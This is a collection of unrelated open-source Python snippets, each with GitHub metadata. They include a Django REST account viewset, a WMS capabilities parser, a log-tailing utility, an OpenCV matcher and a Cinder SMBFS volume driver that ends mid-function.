### commands auto generated by Alembic - please adjust! ###
op.drop_column('pending_ride', 'external_ride_id')
### end Alembic commands ###
|
{
"content_hash": "d67c3a0052669a251c9fa62b1b35c5d1",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 92,
"avg_line_length": 24.46153846153846,
"alnum_prop": 0.6933962264150944,
"repo_name": "whittlbc/jarvis",
"id": "03b1c0ac73f4189a3907a2c9dfa9529efab7eb1f",
"size": "636",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "migrations/versions/3088dcf95e92_.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "3356"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "273630"
},
{
"name": "Ruby",
"bytes": "2963"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from pyarrow.lib import benchmark_PandasObjectIsNull
|
{
"content_hash": "8b8be787b61fb52f7fbcf4e4b1c81f8a",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 52,
"avg_line_length": 31,
"alnum_prop": 0.8279569892473119,
"repo_name": "renesugar/arrow",
"id": "e8e38a42f4cabc8de2a71098f05ae52ee3c56473",
"size": "895",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/pyarrow/benchmark.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "73655"
},
{
"name": "Awk",
"bytes": "3683"
},
{
"name": "Batchfile",
"bytes": "34928"
},
{
"name": "C",
"bytes": "428011"
},
{
"name": "C#",
"bytes": "517100"
},
{
"name": "C++",
"bytes": "10120156"
},
{
"name": "CMake",
"bytes": "450430"
},
{
"name": "Dockerfile",
"bytes": "54234"
},
{
"name": "Emacs Lisp",
"bytes": "1825"
},
{
"name": "FreeMarker",
"bytes": "2271"
},
{
"name": "Go",
"bytes": "838776"
},
{
"name": "HTML",
"bytes": "3427"
},
{
"name": "Java",
"bytes": "3527648"
},
{
"name": "JavaScript",
"bytes": "102332"
},
{
"name": "Lua",
"bytes": "8771"
},
{
"name": "M4",
"bytes": "9093"
},
{
"name": "MATLAB",
"bytes": "36600"
},
{
"name": "Makefile",
"bytes": "49970"
},
{
"name": "Meson",
"bytes": "39653"
},
{
"name": "Objective-C",
"bytes": "12125"
},
{
"name": "PLpgSQL",
"bytes": "56995"
},
{
"name": "Perl",
"bytes": "3799"
},
{
"name": "Python",
"bytes": "2152367"
},
{
"name": "R",
"bytes": "272554"
},
{
"name": "Ruby",
"bytes": "862884"
},
{
"name": "Rust",
"bytes": "2208433"
},
{
"name": "Shell",
"bytes": "376434"
},
{
"name": "TSQL",
"bytes": "29787"
},
{
"name": "Thrift",
"bytes": "138360"
},
{
"name": "TypeScript",
"bytes": "1157378"
}
],
"symlink_target": ""
}
|
class ScrapyGlancePipeline(object):
def process_item(self, item, spider):
return item
|
{
"content_hash": "26a2487b359a792e21b6535eb23c45cb",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 41,
"avg_line_length": 32.666666666666664,
"alnum_prop": 0.7040816326530612,
"repo_name": "tgl-dogg/BCC-2s14-PI4-SteampunkSpider",
"id": "b3e83be99a374eb36a1febebbf567e920806a912",
"size": "292",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/steampunk_spider/crawler/pipelines.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "65463"
}
],
"symlink_target": ""
}
|
from rest_framework import permissions, viewsets, status
from rest_framework.response import Response
from .models import Account
from .permissions import IsAccountOwner
from .serializers import AccountSerializer
class AccountViewSet(viewsets.ModelViewSet):
lookup_field = 'username'
queryset = Account.objects.all()
serializer_class = AccountSerializer
def get_permissions(self):
if self.request.method in permissions.SAFE_METHODS:
return permissions.AllowAny(),
if self.request.method == 'POST':
return permissions.AllowAny(),
return permissions.IsAuthenticated(), IsAccountOwner()
def create(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
Account.objects.create_user(**serializer.validated_data)
return Response(serializer.validated_data, status=status.HTTP_201_CREATED)
return Response({
'status': 'Bad request', 'message': 'Account could not be created with received data'
}, status=status.HTTP_400_BAD_REQUEST)
|
{
"content_hash": "4cee8a821d8aac538a22941d6db11b3c",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 97,
"avg_line_length": 33.666666666666664,
"alnum_prop": 0.7020702070207021,
"repo_name": "quaest-io/quaest-io",
"id": "29a368776fabc818ed5d8fed83732bfdb1cf7ef2",
"size": "1111",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "quaestio/authentication/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "104"
},
{
"name": "HTML",
"bytes": "5997"
},
{
"name": "JavaScript",
"bytes": "4243"
},
{
"name": "Python",
"bytes": "20817"
},
{
"name": "Shell",
"bytes": "84"
}
],
"symlink_target": ""
}
|
from msrest.serialization import Model
class ContainerServiceCredentials(Model):
"""Information about the Azure Container Registry which contains the images
deployed to the cluster.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar acs_kube_config: The ACS kube config file.
:vartype acs_kube_config: str
:ivar service_principal_configuration: Service principal configuration
used by Kubernetes.
:vartype service_principal_configuration:
~azure.mgmt.machinelearningcompute.models.ServicePrincipalProperties
:ivar image_pull_secret_name: The ACR image pull secret name which was
created in Kubernetes.
:vartype image_pull_secret_name: str
"""
_validation = {
'acs_kube_config': {'readonly': True},
'service_principal_configuration': {'readonly': True},
'image_pull_secret_name': {'readonly': True},
}
_attribute_map = {
'acs_kube_config': {'key': 'acsKubeConfig', 'type': 'str'},
'service_principal_configuration': {'key': 'servicePrincipalConfiguration', 'type': 'ServicePrincipalProperties'},
'image_pull_secret_name': {'key': 'imagePullSecretName', 'type': 'str'},
}
def __init__(self):
super(ContainerServiceCredentials, self).__init__()
self.acs_kube_config = None
self.service_principal_configuration = None
self.image_pull_secret_name = None
|
{
"content_hash": "4e9da01717738e600de2e02d42dbb33f",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 122,
"avg_line_length": 38.36842105263158,
"alnum_prop": 0.6831275720164609,
"repo_name": "lmazuel/azure-sdk-for-python",
"id": "17a92a26e1f2299973c9d6f85b460014db41fcba",
"size": "1932",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "azure-mgmt-machinelearningcompute/azure/mgmt/machinelearningcompute/models/container_service_credentials.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "42572767"
}
],
"symlink_target": ""
}
|
import logging
from eventkit_cloud.utils.services.errors import MissingLayerError, UnsupportedFormatError, ServiceError
from eventkit_cloud.utils.services.ows import OWS
logger = logging.getLogger(__name__)
class WMS(OWS):
def __init__(self, *args, **kwargs):
super(WMS, self).__init__(*args, **kwargs)
self.query["SERVICE"] = "WMS"
# 1.3.0 will work as well, if that's returned. 1.0.0 isn't widely supported.
self.query["VERSION"] = "1.1.1"
def find_layer(self, root):
"""
:param root: Name of layer to find
:return: XML 'Layer' Element, or None if not found
"""
capability = root.find(".//capability")
if capability is None:
raise UnsupportedFormatError()
# Flatten nested layers to single list
layers = capability.findall("layer")
sublayers = layers
while len(sublayers) > 0:
sublayers = [layer for layer in sublayers for layer in layer.findall("layer")]
layers.extend(sublayers)
# Get layer names
layer_names = [(layer, layer.find("name")) for layer in layers]
logger.debug("WMS layers offered: {}".format([name.text for layer, name in layer_names if name]))
requested_layer = self.get_layer_name()
layer = [layer for layer, name in layer_names if name is not None and requested_layer == name.text]
if not layer:
raise MissingLayerError(
f"Unable to find requested WMS layer '{requested_layer}'"
f" in layer list: {' '.join(str(ln.text) for ln in layer_names)}"
)
layer = layer[0]
return layer
def get_bbox(self, element):
bbox_element = element.find("latlonboundingbox")
if bbox_element is not None:
bbox = [float(bbox_element.attrib[point]) for point in ["minx", "miny", "maxx", "maxy"]]
return bbox
bbox_element = element.find("ex_geographicboundingbox")
if bbox_element is not None:
points = ["westboundlongitude", "southboundlatitude", "eastboundlongitude", "northboundlatitude"]
bbox = [float(bbox_element.findtext(point)) for point in points]
return bbox
def get_layer_name(self):
try:
layer_name = (
self.config.get("sources", {})
.get("default", {})
.get("req", {})
.get("layers") # TODO: Can there be more than one layer name in the WMS/WMTS config?
)
except AttributeError:
logger.error("Unable to get layer name from provider configuration.")
logger.info(self.config)
raise ServiceError()
if layer_name is None:
raise MissingLayerError("Unable to find WMS layer, no layer name found in config")
layer_name = str(layer_name).lower()
return layer_name
|
{
"content_hash": "53e2e4d9021099edfd118245a5c0c8b0",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 109,
"avg_line_length": 38.62820512820513,
"alnum_prop": 0.5784931961500166,
"repo_name": "venicegeo/eventkit-cloud",
"id": "145f7e26808f71436d6d7137926ab29d63b163fc",
"size": "3013",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "eventkit_cloud/utils/services/wms.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "90420"
},
{
"name": "Dockerfile",
"bytes": "2466"
},
{
"name": "HTML",
"bytes": "85741"
},
{
"name": "Java",
"bytes": "123740"
},
{
"name": "JavaScript",
"bytes": "597810"
},
{
"name": "Python",
"bytes": "1145801"
},
{
"name": "Shell",
"bytes": "6127"
},
{
"name": "TypeScript",
"bytes": "1456680"
}
],
"symlink_target": ""
}
|
__author__ = 'vialette'
class ItemEvent(object):
REQUEST_ADD_ITEM = 0
START_ADD_ITEM = 1
END_ADD_ITEM = 2
def __init__(self, event_type, timestamp, item):
self._event_type = event_type
self._timestamp = timestamp
self._item = item
@property
def event_type(self):
"""Return the asociated item event type code.
"""
return self._event_type
@property
def timestamp(self):
"""Return the associated timestamp.
"""
return self._timestamp
@property
def item(self):
"""Return the associated item.
"""
return self._item
def event_type_str(self):
"""Stringify the item event type of this item event.
"""
if self.event_type == ItemEvent.REQUEST_ADD_ITEM:
return "REQUEST_ADD_ITEM"
elif self.event_type == ItemEvent.START_ADD_ITEM:
return "START_ADD_ITEM"
elif self.event_type == ItemEvent.END_ADD_ITEM:
return "END_ADD_ITEM"
else:
raise ValueError("bad event type code {}".format(self.event_type))
def __str__(self):
"""Stringify this item event.
"""
return "event_type={} timestamp={} item={}".format(self.event_type_str(), self.timestamp, self.item)
|
{
"content_hash": "cf2754d7dd2d1ff3adfffa468d904286",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 108,
"avg_line_length": 27.333333333333332,
"alnum_prop": 0.5708841463414634,
"repo_name": "vialette/ultrastorage",
"id": "c151f07c0a632ddbc1cf5c424053d1d0701867b7",
"size": "1312",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ultrastorage/itemevent/itemevent.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "66502"
},
{
"name": "Python",
"bytes": "110031"
}
],
"symlink_target": ""
}
|
import binascii
import os
from stat import ST_INO, ST_SIZE
class TailFile(object):
CRC_SIZE = 16
def __init__(self, logger, path, callback):
self._path = path
self._f = None
self._inode = None
self._size = 0
self._crc = None
self._log = logger
self._callback = callback
def _open_file(self, move_end=False, pos=False):
already_open = False
# close and reopen to handle logrotate
if self._f is not None:
self._f.close()
self._f = None
already_open = True
stat = os.stat(self._path)
inode = stat[ST_INO]
size = stat[ST_SIZE]
# Compute CRC of the beginning of the file
crc = None
if size >= self.CRC_SIZE:
tmp_file = open(self._path, 'r')
data = tmp_file.read(self.CRC_SIZE)
crc = binascii.crc32(data)
if already_open:
# Check if file has been removed
if self._inode is not None and inode != self._inode:
self._log.debug("File removed, reopening")
move_end = False
pos = False
# Check if file has been truncated
elif self._size > 0 and size < self._size:
self._log.debug("File truncated, reopening")
move_end = False
pos = False
# Check if file has been truncated and too much data has
# alrady been written (copytruncate and opened files...)
if size >= self.CRC_SIZE and self._crc is not None and crc != self._crc:
self._log.debug("Begining of file modified, reopening")
move_end = False
pos = False
self._inode = inode
self._size = size
self._crc = crc
self._f = open(self._path, 'r')
if move_end:
self._log.debug("Opening file %s" % (self._path))
self._f.seek(0, os.SEEK_END)
elif pos:
self._log.debug("Reopening file %s at %s" % (self._path, pos))
self._f.seek(pos)
return True
def tail(self, line_by_line=True, move_end=True):
"""Read line-by-line and run callback on each line.
line_by_line: yield each time a callback has returned True
move_end: start from the last line of the log"""
try:
self._open_file(move_end=move_end)
while True:
pos = self._f.tell()
line = self._f.readline()
if line:
line = line.strip(chr(0)) # a truncate may have create holes in the file
if self._callback(line.rstrip("\n")):
if line_by_line:
yield True
pos = self._f.tell()
self._open_file(move_end=False, pos=pos)
else:
continue
else:
continue
else:
yield True
assert pos == self._f.tell()
self._open_file(move_end=False, pos=pos)
except Exception as e:
# log but survive
self._log.exception(e)
raise StopIteration(e)
|
{
"content_hash": "69bdd9742eea19374d649901c238578a",
"timestamp": "",
"source": "github",
"line_count": 102,
"max_line_length": 93,
"avg_line_length": 32.78431372549019,
"alnum_prop": 0.4880382775119617,
"repo_name": "indeedops/dd-agent",
"id": "ed9abdd9b9c64a75fe045d6e8a26cfa2013250f7",
"size": "3451",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "utils/tailfile.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "2717"
},
{
"name": "Go",
"bytes": "2389"
},
{
"name": "HTML",
"bytes": "8553"
},
{
"name": "Nginx",
"bytes": "3908"
},
{
"name": "PowerShell",
"bytes": "2665"
},
{
"name": "Python",
"bytes": "2300561"
},
{
"name": "Ruby",
"bytes": "102896"
},
{
"name": "Shell",
"bytes": "61965"
},
{
"name": "XSLT",
"bytes": "2222"
}
],
"symlink_target": ""
}
|
def human_layout_to_computer(human_layout):
computer_layout = {}
for row_num, row in enumerate(human_layout):
for col_num, char in enumerate(row):
computer_layout[char] = {
'x': col_num,
'y': row_num
}
return computer_layout
|
{
"content_hash": "67db0b2facb27d4f24ee6b204c93203c",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 48,
"avg_line_length": 33.333333333333336,
"alnum_prop": 0.54,
"repo_name": "hbaughman/softKey",
"id": "c3279d8cac4b48a38744209ee87e5e3a99e55ca1",
"size": "300",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "calc_char_positions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8818"
}
],
"symlink_target": ""
}
|
import cv2
import numpy as np
import matplotlib.pyplot as plt
def referTemplate(iFrame, threshold):
img_gray = cv2.cvtColor(iFrame, cv2.COLOR_BGR2GRAY)
template = cv2.imread('train.jpg',0)
w, h = template.shape[::-1]
res = cv2.matchTemplate(img_gray,template,cv2.TM_CCOEFF_NORMED)
loc = np.where( res >= threshold)
for pt in zip(*loc[::-1]):
cv2.rectangle(iFrame, pt, (pt[0] + w, pt[1] + h), (0,255,255), 2)
return iFrame
def bruteForceMatcher(iFrame):
img1 = cv2.imread('train.jpg',0)
orb = cv2.ORB_create()
kp1, des1 = orb.detectAndCompute(img1,None)
kp2, des2 = orb.detectAndCompute(iFrame,None)
bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=False)
try:
matches = bf.match(des1,des2)
matches = sorted(matches, key = lambda x:x.distance)
except MatchErrorException as e:
print "No or Improbable Match Found"
img3 = cv2.drawMatches(img1,kp1,iFrame,kp2,matches[:10],None, flags=2)
#plt.imshow(img3)
#plt.show()
return img3
|
{
"content_hash": "23a6203f8d5b579a6f4e23882fc003fe",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 74,
"avg_line_length": 24.136363636363637,
"alnum_prop": 0.6393596986817326,
"repo_name": "Gobind03/Gesture-Recognition",
"id": "a8a961e11622e6c2182a3f9a825de3a08f385c21",
"size": "1062",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python-Implementation/ObjectRecognition.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "7087"
},
{
"name": "Python",
"bytes": "2189"
}
],
"symlink_target": ""
}
|
{
'name': 'Initial Setup Tools',
'version': '1.0',
'category': 'Hidden',
'description': """
This module helps to configure the system at the installation of a new database.
================================================================================
Shows you a list of applications features to install from.
""",
'author': 'OpenERP SA',
'website': 'http://www.openerp.com',
'depends': ['base', 'web_kanban'],
'data': [
'security/ir.model.access.csv',
'base_setup_views.xml',
'res_config_view.xml',
'res_partner_view.xml',
],
'demo': [],
'installable': True,
'auto_install': False,
'images': ['images/base_setup1.jpeg','images/base_setup2.jpeg','images/base_setup3.jpeg','images/base_setup4.jpeg',],
'css': ['static/src/css/base_setup.css'],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
{
"content_hash": "1a668694b583ef8528c8d40a48bbb1ee",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 121,
"avg_line_length": 33.629629629629626,
"alnum_prop": 0.5594713656387665,
"repo_name": "ntiufalara/openerp7",
"id": "e74238ba59cc20dede38715a28adcd20edad754d",
"size": "1888",
"binary": false,
"copies": "61",
"ref": "refs/heads/master",
"path": "openerp/addons/base_setup/__openerp__.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "9611"
},
{
"name": "C#",
"bytes": "93691"
},
{
"name": "C++",
"bytes": "108790"
},
{
"name": "CSS",
"bytes": "583265"
},
{
"name": "Groff",
"bytes": "8138"
},
{
"name": "HTML",
"bytes": "125159"
},
{
"name": "JavaScript",
"bytes": "5109152"
},
{
"name": "Makefile",
"bytes": "14036"
},
{
"name": "NSIS",
"bytes": "14114"
},
{
"name": "PHP",
"bytes": "14033"
},
{
"name": "Python",
"bytes": "9373763"
},
{
"name": "Ruby",
"bytes": "220"
},
{
"name": "Shell",
"bytes": "6430"
},
{
"name": "XSLT",
"bytes": "156761"
}
],
"symlink_target": ""
}
|
import os
import re
from oslo.config import cfg
from cinder.brick.remotefs import remotefs
from cinder import exception
from cinder.i18n import _
from cinder.image import image_utils
from cinder.openstack.common import log as logging
from cinder.openstack.common import processutils as putils
from cinder.openstack.common import units
from cinder import utils
from cinder.volume.drivers import remotefs as remotefs_drv
VERSION = '1.0.0'
LOG = logging.getLogger(__name__)
volume_opts = [
cfg.StrOpt('smbfs_shares_config',
default='/etc/cinder/smbfs_shares',
help='File with the list of available smbfs shares.'),
cfg.StrOpt('smbfs_default_volume_format',
default='qcow2',
help=('Default format that will be used when creating volumes '
'if no volume format is specified. Can be set to: '
'raw, qcow2, vhd or vhdx.')),
cfg.BoolOpt('smbfs_sparsed_volumes',
default=True,
help=('Create volumes as sparsed files which take no space '
'rather than regular files when using raw format, '
'in which case volume creation takes lot of time.')),
cfg.FloatOpt('smbfs_used_ratio',
default=0.95,
help=('Percent of ACTUAL usage of the underlying volume '
'before no new volumes can be allocated to the volume '
'destination.')),
cfg.FloatOpt('smbfs_oversub_ratio',
default=1.0,
help=('This will compare the allocated to available space on '
'the volume destination. If the ratio exceeds this '
'number, the destination will no longer be valid.')),
cfg.StrOpt('smbfs_mount_point_base',
default='$state_path/mnt',
help=('Base dir containing mount points for smbfs shares.')),
cfg.StrOpt('smbfs_mount_options',
default='noperm,file_mode=0775,dir_mode=0775',
help=('Mount options passed to the smbfs client. See '
'mount.cifs man page for details.')),
]
CONF = cfg.CONF
CONF.register_opts(volume_opts)
class SmbfsDriver(remotefs_drv.RemoteFSSnapDriver):
"""SMBFS based cinder volume driver.
"""
driver_volume_type = 'smbfs'
driver_prefix = 'smbfs'
volume_backend_name = 'Generic_SMBFS'
SHARE_FORMAT_REGEX = r'//.+/.+'
VERSION = VERSION
_DISK_FORMAT_VHD = 'vhd'
_DISK_FORMAT_VHD_LEGACY = 'vpc'
_DISK_FORMAT_VHDX = 'vhdx'
_DISK_FORMAT_RAW = 'raw'
_DISK_FORMAT_QCOW2 = 'qcow2'
def __init__(self, execute=putils.execute, *args, **kwargs):
self._remotefsclient = None
super(SmbfsDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(volume_opts)
root_helper = utils.get_root_helper()
self.base = getattr(self.configuration,
'smbfs_mount_point_base')
opts = getattr(self.configuration,
'smbfs_mount_options')
self._remotefsclient = remotefs.RemoteFsClient(
'cifs', root_helper, execute=execute,
smbfs_mount_point_base=self.base,
smbfs_mount_options=opts)
self.img_suffix = None
def _qemu_img_info(self, path, volume_name):
return super(SmbfsDriver, self)._qemu_img_info_base(
path, volume_name, self.configuration.smbfs_mount_point_base)
def initialize_connection(self, volume, connector):
"""Allow connection to connector and return connection info.
:param volume: volume reference
:param connector: connector reference
"""
# Find active image
active_file = self.get_active_image_from_info(volume)
active_file_path = os.path.join(self._local_volume_dir(volume),
active_file)
info = self._qemu_img_info(active_file_path, volume['name'])
fmt = info.file_format
data = {'export': volume['provider_location'],
'format': fmt,
'name': active_file}
if volume['provider_location'] in self.shares:
data['options'] = self.shares[volume['provider_location']]
return {
'driver_volume_type': self.driver_volume_type,
'data': data,
'mount_point_base': self._get_mount_point_base()
}
def do_setup(self, context):
config = self.configuration.smbfs_shares_config
if not config:
msg = (_("SMBFS config file not set (smbfs_shares_config)."))
LOG.error(msg)
raise exception.SmbfsException(msg)
if not os.path.exists(config):
msg = (_("SMBFS config file at %(config)s doesn't exist.") %
{'config': config})
LOG.error(msg)
raise exception.SmbfsException(msg)
if not os.path.isabs(self.base):
msg = _("Invalid mount point base: %s") % self.base
LOG.error(msg)
raise exception.SmbfsException(msg)
if not self.configuration.smbfs_oversub_ratio > 0:
msg = _(
"SMBFS config 'smbfs_oversub_ratio' invalid. Must be > 0: "
"%s") % self.configuration.smbfs_oversub_ratio
LOG.error(msg)
raise exception.SmbfsException(msg)
if ((not self.configuration.smbfs_used_ratio > 0) and
(self.configuration.smbfs_used_ratio <= 1)):
msg = _("SMBFS config 'smbfs_used_ratio' invalid. Must be > 0 "
"and <= 1.0: %s") % self.configuration.smbfs_used_ratio
LOG.error(msg)
raise exception.SmbfsException(msg)
self.shares = {} # address : options
self._ensure_shares_mounted()
def local_path(self, volume):
"""Get volume path (mounted locally fs path) for given volume.
:param volume: volume reference
"""
fmt = self.get_volume_format(volume)
local_dir = self._local_volume_dir(volume)
local_path = os.path.join(local_dir, volume['name'])
if fmt in (self._DISK_FORMAT_VHD, self._DISK_FORMAT_VHDX):
local_path += '.' + fmt
return local_path
def _local_path_volume_info(self, volume):
return '%s%s' % (self.local_path(volume), '.info')
def _get_new_snap_path(self, snapshot):
vol_path = self.local_path(snapshot['volume'])
snap_path, ext = os.path.splitext(vol_path)
snap_path += '.' + snapshot['id'] + ext
return snap_path
def get_volume_format(self, volume, qemu_format=False):
volume_dir = self._local_volume_dir(volume)
volume_path = os.path.join(volume_dir, volume['name'])
if os.path.exists(volume_path):
info = self._qemu_img_info(volume_path, volume['name'])
volume_format = info.file_format
else:
volume_format = (
self._get_volume_format_spec(volume) or
self.configuration.smbfs_default_volume_format)
if qemu_format and volume_format == self._DISK_FORMAT_VHD:
volume_format = self._DISK_FORMAT_VHD_LEGACY
elif volume_format == self._DISK_FORMAT_VHD_LEGACY:
volume_format = self._DISK_FORMAT_VHD
return volume_format
@utils.synchronized('smbfs', external=False)
def delete_volume(self, volume):
"""Deletes a logical volume."""
if not volume['provider_location']:
LOG.warn(_('Volume %s does not have provider_location specified, '
'skipping.'), volume['name'])
return
self._ensure_share_mounted(volume['provider_location'])
volume_dir = self._local_volume_dir(volume)
mounted_path = os.path.join(volume_dir,
self.get_active_image_from_info(volume))
if os.path.exists(mounted_path):
self._delete(mounted_path)
else:
LOG.debug("Skipping deletion of volume %s as it does not exist." %
mounted_path)
info_path = self._local_path_volume_info(volume)
self._delete(info_path)
def get_qemu_version(self):
info, _ = self._execute('qemu-img', check_exit_code=False)
pattern = r"qemu-img version ([0-9\.]*)"
version = re.match(pattern, info)
if not version:
LOG.warn(_("qemu-img is not installed."))
return None
return [int(x) for x in version.groups()[0].split('.')]
def _create_windows_image(self, volume_path, volume_size, volume_format):
"""Creates a VHD or VHDX file of a given size."""
# vhd is regarded as vpc by qemu
if volume_format == self._DISK_FORMAT_VHD:
volume_format = self._DISK_FORMAT_VHD_LEGACY
else:
qemu_version = self.get_qemu_version()
if qemu_version < [1, 7]:
err_msg = _("This version of qemu-img does not support vhdx "
"images. Please upgrade to 1.7 or greater.")
raise exception.SmbfsException(err_msg)
self._execute('qemu-img', 'create', '-f', volume_format,
volume_path, str(volume_size * units.Gi),
run_as_root=True)
def _do_create_volume(self, volume):
"""Create a volume on given smbfs_share.
:param volume: volume reference
"""
volume_format = self.get_volume_format(volume)
volume_path = self.local_path(volume)
volume_size = volume['size']
LOG.debug("Creating new volume at %s." % volume_path)
if os.path.exists(volume_path):
msg = _('File already exists at %s.') % volume_path
LOG.error(msg)
raise exception.InvalidVolume(reason=msg)
if volume_format in (self._DISK_FORMAT_VHD, self._DISK_FORMAT_VHDX):
self._create_windows_image(volume_path, volume_size,
volume_format)
else:
self.img_suffix = None
if volume_format == self._DISK_FORMAT_QCOW2:
self._create_qcow2_file(volume_path, volume_size)
elif self.configuration.smbfs_sparsed_volumes:
self._create_sparsed_file(volume_path, volume_size)
else:
self._create_regular_file(volume_path, volume_size)
self._set_rw_permissions_for_all(volume_path)
def _get_capacity_info(self, smbfs_share):
"""Calculate available space on the SMBFS share.
:param smbfs_share: example //172.18.194.100/share
"""
mount_point = self._get_mount_point_for_share(smbfs_share)
df, _ = self._execute('stat', '-f', '-c', '%S %b %a', mount_point,
run_as_root=True)
block_size, blocks_total, blocks_avail = map(float, df.split())
total_available = block_size * blocks_avail
total_size = block_size * blocks_total
du, _ = self._execute('du', '-sb', '--apparent-size', '--exclude',
'*snapshot*', mount_point, run_as_root=True)
total_allocated = float(du.split()[0])
return total_size, total_available, total_allocated
def _find_share(self, volume_size_in_gib):
"""Choose SMBFS share among available ones for given volume size.
For instances with more than one share that meets the criteria, the
share with the least "allocated" space will be selected.
:param volume_size_in_gib: int size in GB
"""
if not self._mounted_shares:
raise exception.SmbfsNoSharesMounted()
target_share = None
target_share_reserved = 0
for smbfs_share in self._mounted_shares:
if not self._is_share_eligible(smbfs_share, volume_size_in_gib):
continue
total_allocated = self._get_capacity_info(smbfs_share)[2]
if target_share is not None:
if target_share_reserved > total_allocated:
target_share = smbfs_share
target_share_reserved = total_allocated
else:
target_share = smbfs_share
target_share_reserved = total_allocated
if target_share is None:
raise exception.SmbfsNoSuitableShareFound(
volume_size=volume_size_in_gib)
LOG.debug('Selected %s as target smbfs share.' % target_share)
return target_share
def _is_share_eligible(self, smbfs_share, volume_size_in_gib):
"""Verifies SMBFS share is eligible to host volume with given size.
First validation step: ratio of actual space (used_space / total_space)
is less than 'smbfs_used_ratio'. Second validation step: apparent space
allocated (differs from actual space used when using sparse files)
and compares the apparent available
space (total_available * smbfs_oversub_ratio) to ensure enough space is
available for the new volume.
:param smbfs_share: smbfs share
:param volume_size_in_gib: int size in GB
"""
used_ratio = self.configuration.smbfs_used_ratio
oversub_ratio = self.configuration.smbfs_oversub_ratio
requested_volume_size = volume_size_in_gib * units.Gi
total_size, total_available, total_allocated = \
self._get_capacity_info(smbfs_share)
apparent_size = max(0, total_size * oversub_ratio)
apparent_available = max(0, apparent_size - total_allocated)
used = (total_size - total_available) / total_size
if used > used_ratio:
LOG.debug('%s is above smbfs_used_ratio.' % smbfs_share)
return False
if apparent_available <= requested_volume_size:
LOG.debug('%s is above smbfs_oversub_ratio.' % smbfs_share)
return False
if total_allocated / total_size >= oversub_ratio:
LOG.debug('%s reserved space is above smbfs_oversub_ratio.' %
smbfs_share)
return False
return True
@utils.synchronized('smbfs', external=False)
def create_snapshot(self, snapshot):
"""Apply locking to the create snapshot operation."""
return self._create_snapshot(snapshot)
def _create_snapshot_online(self, snapshot, backing_filename,
new_snap_path):
msg = _("This driver does not support snapshotting in-use volumes.")
raise exception.SmbfsException(msg)
def _delete_snapshot_online(self, context, snapshot, info):
msg = _("This driver does not support deleting in-use snapshots.")
raise exception.SmbfsException(msg)
def _do_create_snapshot(self, snapshot, backing_filename, new_snap_path):
self._check_snapshot_support(snapshot)
super(SmbfsDriver, self)._do_create_snapshot(
snapshot, backing_filename, new_snap_path)
def _check_snapshot_support(self, snapshot):
volume_format = self.get_volume_format(snapshot['volume'])
# qemu-img does not yet support differencing vhd/vhdx
if volume_format in (self._DISK_FORMAT_VHD, self._DISK_FORMAT_VHDX):
err_msg = _("Snapshots are not supported for this volume "
"format: %s") % volume_format
raise exception.InvalidVolume(err_msg)
@utils.synchronized('smbfs', external=False)
def delete_snapshot(self, snapshot):
"""Apply locking to the delete snapshot operation."""
return self._delete_snapshot(snapshot)
@utils.synchronized('smbfs', external=False)
def extend_volume(self, volume, size_gb):
LOG.info(_('Extending volume %s.'), volume['id'])
self._extend_volume(volume, size_gb)
def _extend_volume(self, volume, size_gb):
volume_path = self.local_path(volume)
self._check_extend_volume_support(volume, size_gb)
LOG.info(_('Resizing file to %sG...') % size_gb)
self._do_extend_volume(volume_path, size_gb, volume['name'])
def _do_extend_volume(self, volume_path, size_gb, volume_name):
info = self._qemu_img_info(volume_path, volume_name)
fmt = info.file_format
# Note(lpetrut): as for version 2.0, qemu-img cannot resize
# vhd/x images. For the moment, we'll just use an intermediary
# conversion in order to be able to do the resize.
if fmt in (self._DISK_FORMAT_VHDX, self._DISK_FORMAT_VHD_LEGACY):
temp_image = volume_path + '.tmp'
image_utils.convert_image(volume_path, temp_image,
self._DISK_FORMAT_RAW)
image_utils.resize_image(temp_image, size_gb)
image_utils.convert_image(temp_image, volume_path, fmt)
self._delete(temp_image)
else:
image_utils.resize_image(volume_path, size_gb)
if not self._is_file_size_equal(volume_path, size_gb):
